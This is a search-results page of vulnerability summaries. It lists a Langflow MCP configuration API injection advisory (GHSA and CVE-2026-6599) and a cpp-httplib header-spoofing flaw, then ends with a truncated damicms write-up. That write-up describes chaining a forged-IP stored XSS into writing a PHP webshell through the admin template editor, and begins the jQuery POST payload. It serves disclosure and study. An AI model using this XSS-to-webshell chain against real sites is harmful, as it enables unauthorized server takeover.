4 matches found
GHSA-V66P-F7X3-4794 Langflow vulnerable to injection
A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function getclientip/installmcpconfig of the file src/backend/base/langflow/api/v1/mcpprojects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument...
CVE-2026-6599
A vulnerability was detected in langflow-ai langflow up to 1.8.3. The impacted element is the function getclientip/installmcpconfig of the file src/backend/base/langflow/api/v1/mcpprojects.py of the component Model Context Protocol Configuration API. Performing a manipulation of the argument...
EUVD-2025-201454
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allows attacker-controlled HTTP headers to influence server-visible metadata, logging, and authorization decisions. An attacker can supply X-Forwarded-For or X-Real-IP headers which...
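damicms stored XSS leading to getshell
Brief description: damicms stored XSS leading to getshell. Detailed description: 1. XSS: Damicms uses the dreaded getclientip, so the IP can be forged directly, and the IP field is varchar50, which is enough for my XSS. Then: OK. 2. XSS leading to getshell: since the admin backend can edit files directly and generate a PHP webshell, we use JS to getshell directly. The JS is as follows: $.ajax "url": "http://192.168.153.132/dami/admin.php?s=/Tpl/Update", "type": "POST", "data":...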